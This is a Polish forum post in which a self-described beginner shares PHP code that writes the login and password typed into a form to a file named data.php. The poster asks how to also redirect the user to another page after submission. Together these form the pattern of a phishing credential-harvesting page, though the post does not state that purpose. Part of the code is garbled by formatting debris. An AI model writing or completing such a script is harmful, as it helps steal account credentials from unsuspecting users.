Skrypt + odsyłacz - pytanie od laika

Witam.

Z góry zaznaczam, że nie znam się wcale, więc bardzo bym prosił o w miarę prostą odpowiedź.

Prosiłem przyjaciela o napisanie skryptu, który po naciśnięciu buttona ‘log in’ będzie zapisywał login/pass wpisane w pola do określonego pliku (dla przykładu niech to będzie ‘data.php’).

Przyjaciel napisał mi coś takiego:

<?


if(isset($_POST['submit']))

{

    foreach ($_POST AS $klucz => $wartosc)

    {

        $wartosc= trim($wartosc);//usuwamy biale znaki

          if (get_magic_quotes_gpc()) 

              $wartosc= stripslashes($wartosc);

        $wartosc=htmlspecialchars($wartosc, ENT_QUOTES);

        $_POST[$klucz]=$wartosc;

    }


    $login=$_POST['user'];

    $pass=$_POST['pass2'];


    $blad_txt='';

    $blad=false;





    //sprawdzamy czy jest wypelnine pole login

    if(strlen($login)<2){

        $blad_txt.='
Wpisz testowy login'; $blad=true; } //sprawdzamy czy jest wypelnine pole pass if(strlen($pass)\<2){ $blad\_txt.=' **** Wpisz testowy pass'; $blad=true; } if(!$blad) { //poprawne dane - robmy z nimi co trzeba (zapisujemy do bazy danych itp.) $noweDane = " **Login:**".$login." **Password:**".$pass." "; $fp = fopen("data.php", "a"); fputs($fp, $noweDane); fclose($fp); echo ''; } else { //cos jest zle – wyswietlamy stosowne komunikaty echo $blad\_txt; } } else { //wypelniamy zmienne pustymi danymi jesli formularz nie zostal jeszcze wyslany $login=''; $pass=''; echo $blad\_txt; } echo ' ' ?\>[/code]

I tu pojawiają się pytania:

  1. Co wpisać w miejsce echo ‘’ (trzeba coś wpisać, czy można bez obawy skasować/zostawić puste?) ?

  2. Teraz natomiast chciałbym, żeby po naciśnięciu buttonu ‘log in’ strona automatycznie robiła dwie rzeczy: zapisywała to, co jest w polach login/pass (co też robi), a także przekierowywała użytkownika do innej, określonej strony.